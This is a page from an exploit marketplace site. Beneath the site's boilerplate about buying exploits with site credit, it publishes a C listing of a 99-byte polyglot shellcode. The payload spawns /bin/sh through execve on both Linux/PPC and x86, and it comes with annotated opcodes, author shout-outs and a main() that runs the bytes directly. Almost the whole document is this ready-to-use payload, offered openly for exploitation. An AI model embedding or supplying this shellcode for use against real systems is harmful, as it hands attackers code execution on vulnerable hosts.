0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/PPC/x86 execve("/bin/sh",{"/bin/sh",NULL},NULL) 99 bytes
[==============================================================
linux/PPC/x86 execve("/bin/sh",{"/bin/sh",NULL},NULL) 99 bytes
==============================================================
/*
* -[ dual-linux.c ]-
* by core@bokeoa.com (ripped from nemo@felinemenace.org)
* ^-- much <3 brotha ;)
*
* execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode for linux (both the ppc
* and x86 version.) I thought about adding mipsel but I don't feel up to it
* at the moment. In fact I feel like crap...
*
* Shoutz to nemo, andrewg, KF, ghandi, phased, MRX, Blue Boar, Solar Eclipse,
* HDM, FX, Max Vision, MaXx, c0ntex, izik, xort, banned-it, hoglund, SkyLined,
* Gera, Stealth (7350), Emmanuel, Hackademy, Raptor (0xdeadbeef), sh0k, jduck,
* xfocus, LSD, ADM, b10z, 0dd, ES, runixd, packy, norse, mXn, thn, dragnet,
* hdm, fozzy, str0ke, B|ueberry, <S>, rjohnson, Kaliman, capsyl, salvia,
* amnesia, arcanum, eazyass, loophole, my family and so any others...
*
* irc.pulltheplug.org #social
*
* peace ~ metta ~
*
* References:
* http://milw0rm.com/id.php?id=1318
* http://www.phrack.org/phrack/57/p57-0x0e
*/
char dual_linux[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL
// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";
int main(int ac, char **av)
{
void (*fp)() = dual_linux;
fp();
}
// in loving memory of hack.co.za
# 0day.today [2024-11-17] #